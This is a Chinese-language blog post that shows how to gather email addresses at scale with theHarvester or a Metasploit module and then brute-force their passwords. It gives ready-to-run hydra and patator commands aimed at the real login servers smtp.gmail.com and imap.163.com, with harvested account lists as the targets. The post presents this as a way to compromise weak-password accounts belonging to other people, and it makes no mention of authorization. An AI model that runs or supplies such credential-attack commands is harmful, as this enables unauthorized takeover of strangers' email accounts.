Theharvester+Hydra批量扫弱口令账户


Oct 20 2015

Theharvester+Hydra批量扫弱口令账户

首页 » 渗透测试 » Theharvester+Hydra批量扫弱口令账户   

  theHarvester是一个社会工程学工具,它通过搜索引擎、PGP服务器以及SHODAN数据库收集用户的email,子域名,主机,雇员名,开放端口和banner信息;
例如以下为扫描baidu.com的简单信息:
Theharvester+Hydra批量扫弱口令账户 - xiao106347 - Linux 折腾笔记
 
但是这里我们即将使用的是利用theHarvester的扫描在线账户的功能,例如邮箱帐号;简单用法:
$ theHarvester -d 163.com -l 1000 -b google
       -d 后跟服务器域名    163.com  hotmail.com  gmail.com  126.com  qq.com ... ...
      -l  限制显示数目      
      -b  调用搜索引擎(google,bing,bingapi,pgp,linkedin,google-profiles,people123,jigsaw,all)
         这样扫描的是以163.com为域名的所有服务器的管理员帐号和所有目前在线的帐号,所以每隔 一段时间扫描的结果是不一样的,除了网站管理员帐号不变外;别忘了google.com是要挂vpn才能访问的!

或者也可以使用metasploit的 auxiliary/gather/search_email_collector 模块:
Theharvester+Hydra批量扫弱口令账户 - xiao106347 - Linux 折腾笔记
 
 然后把扫描结果保存为txt,使用在线密码破解软件就可以批量暴力破解了;例如:
Theharvester+Hydra批量扫弱口令账户 - xiao106347 - Linux 折腾笔记
 
  hydra -S -L file/gmail.com.txt -P file/password.txt -e ns -V -s 465 smtp.gmail.com smtp
  hydra -L file/163.com.txt -P file/password.txt -e ns -V -t 40 imap.163.com imap
  patator imap_login host=imap.163.com user=FILE0 password=FILE1 0=file/163.com.txt 1=file/passwords.txt
 。。。 。。。
因为每隔一段时间扫描到的账户一般是不同的,所以这个账户文档可以越来越丰富。。。

想法是丰满的,现实是骨感的;貌似现在遇到了点困难:
Theharvester+Hydra批量扫弱口令账户 - xiao106347 - Linux 折腾笔记

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签:这篇文章木有标签

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «smtp-user-enum | 使用telnet登陆smtp服务发邮件(带身份验证)»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

已有1条评论

suifong

2015-11-09 16:45 沙发
涨知识了!